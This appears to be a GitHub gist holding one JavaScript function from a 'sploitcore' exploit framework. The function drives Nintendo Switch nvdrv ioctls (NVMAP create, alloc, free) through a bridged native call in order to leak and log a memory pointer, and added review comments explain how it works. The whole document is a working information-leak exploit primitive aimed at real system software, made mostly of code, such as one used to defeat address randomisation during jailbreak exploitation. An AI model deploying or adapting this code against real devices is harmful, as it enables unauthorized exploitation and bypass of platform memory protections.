@hexkyz
Created December 28, 2018 19:09
/**
 * Issues three nvdrv ioctls in sequence (NVMAP_IOC_CREATE, NVMAP_IOC_ALLOC,
 * NVMAP_IOC_FREE) through a bridged native call, then returns the 8-byte
 * value read back at offset 0x8 of the output buffer after the FREE call.
 *
 * @param {*} nvdrv_buf - first argument forwarded unchanged to every nvdrv_ioctl call
 * @param {*} dev_handle - second argument forwarded unchanged to every nvdrv_ioctl call
 * @returns {*} the value read with read8 from out_buf+0x8 (also logged as 'Leaked ptr')
 *
 * NOTE(review): each ioctl's status word is read into ioctl_status but never
 * checked, so the returned value is produced even if an earlier ioctl failed.
 * NOTE(review): this.free(temp_buf) is not inside a finally; an exception from
 * the bridged call leaves the scratch buffer allocated.
 */
sploitcore.prototype.nvdrv_sharedmem_leak = function(nvdrv_buf, dev_handle) {
// 0x1000-byte scratch region; every ioctl argument struct below is carved out of it
var temp_buf = this.malloc(0x1000);
// Bridge to the native routine at 0x1A247C: returns int, takes
// (void_p, int, int, void_p, void_p, void_p)
var nvdrv_ioctl = this.bridge(0x1A247C, types.int, types.void_p, types.int, types.int, types.void_p, types.void_p, types.void_p);
// Setup buffers
// Three small descriptor structs at 0x000/0x100/0x200 and two 0x100-byte
// payload buffers at 0x800/0x900 (sizes written below)
var in_buf_ioctl = utils.add2(temp_buf, 0x000);
var out_buf_ioctl = utils.add2(temp_buf, 0x100);
var out_buf_status = utils.add2(temp_buf, 0x200);
var in_buf = utils.add2(temp_buf, 0x800);
var out_buf = utils.add2(temp_buf, 0x900);
var ioctl_num = 0;
// Prepare in/out buffers
// Third argument to write4/write8/read4/read8 is apparently a 32-bit word
// index, hence the byte offsets divided by 4 throughout
this.write8(in_buf, in_buf_ioctl, 0x00/4); // Write the input buffer's address
this.write4(0x00000100, in_buf_ioctl, 0x08/4); // Write the input buffer's size
this.write8(out_buf, out_buf_ioctl, 0x00/4); // Write the output buffer's address
this.write4(0x00000100, out_buf_ioctl, 0x08/4); // Write the output buffer's size
// Setup the creation params
this.write4(0x00010000, in_buf, 0x00/4);
// Call NVMAP_IOC_CREATE
ioctl_num = 0xC0080101;
// The bridged call returns an array-like; element 0 is treated as the result
// code in the log lines below
var ioctl_res = nvdrv_ioctl(nvdrv_buf, dev_handle, ioctl_num, in_buf_ioctl, out_buf_ioctl, out_buf_status);
// Read status
var ioctl_status = this.read4(out_buf_status);
// Read back handle
// Handle is the second 32-bit word of the output buffer; it is reused as the
// first field of both the ALLOC and FREE parameter structs
var nvmap_handle = this.read4(out_buf, 0x04/4);
if (this.nvdrv_show_log)
utils.log('nvdrv_ioctl (NVMAP_IOC_CREATE): result == 0x' + ioctl_res[0].toString(16) + ", status == 0x" + ioctl_status.toString(16) + ", nvmap_handle == 0x" + nvmap_handle.toString(16));
// Setup the allocation params
this.write4(nvmap_handle, in_buf, 0x00/4); // handle
this.write4(0x00000000, in_buf, 0x04/4); // heap mask
this.write4(0x00000001, in_buf, 0x08/4); // flags
this.write4(0x00001000, in_buf, 0x0C/4); // align
this.write4(0x00000000, in_buf, 0x10/4); // kind
this.write4(0x00000000, in_buf, 0x14/4); // padding
this.write4(0x00000000, in_buf, 0x18/4); // mem_addr_lo
this.write4(0x00000000, in_buf, 0x1C/4); // mem_addr_hi
// Call NVMAP_IOC_ALLOC
ioctl_num = 0xC0200104;
ioctl_res = nvdrv_ioctl(nvdrv_buf, dev_handle, ioctl_num, in_buf_ioctl, out_buf_ioctl, out_buf_status);
// Read status
ioctl_status = this.read4(out_buf_status);
// Read back result
var nvmap_alloc_res = this.read4(out_buf);
if (this.nvdrv_show_log)
utils.log('nvdrv_ioctl (NVMAP_IOC_ALLOC): result == 0x' + ioctl_res[0].toString(16) + ", status == 0x" + ioctl_status.toString(16) + ", nvmap_alloc_res == 0x" + nvmap_alloc_res.toString(16));
// Setup the free params
// in_buf is overwritten in place; the ALLOC fields above are not cleared,
// only the first six words are rewritten here
this.write4(nvmap_handle, in_buf, 0x00/4); // handle
this.write4(0x00000000, in_buf, 0x04/4); // flags
this.write4(0x00000000, in_buf, 0x08/4); // mem_addr_lo
this.write4(0x00000000, in_buf, 0x0C/4); // mem_addr_hi
this.write4(0x00000000, in_buf, 0x10/4); // mem_size
this.write4(0x00000000, in_buf, 0x14/4); // mem_is_cached
// Call NVMAP_IOC_FREE
ioctl_num = 0xC0180105;
ioctl_res = nvdrv_ioctl(nvdrv_buf, dev_handle, ioctl_num, in_buf_ioctl, out_buf_ioctl, out_buf_status);
// Read status
ioctl_status = this.read4(out_buf_status);
// Read back result
var nvmap_free_res = this.read4(out_buf);
if (this.nvdrv_show_log)
utils.log('nvdrv_ioctl (NVMAP_IOC_FREE): result == 0x' + ioctl_res[0].toString(16) + ", status == 0x" + ioctl_status.toString(16) + ", nvmap_free_res == 0x" + nvmap_free_res.toString(16));
// Read back the leaked pointer
// 64-bit read at out_buf+0x8, i.e. the words following the FREE result read above;
// taken regardless of the status values collected earlier
var leak_ptr = this.read8(out_buf, 0x08/4);
// Logged unconditionally, unlike the per-ioctl lines gated on nvdrv_show_log
utils.log('Leaked ptr: ' + utils.paddr(leak_ptr));
this.free(temp_buf);
return leak_ptr;
}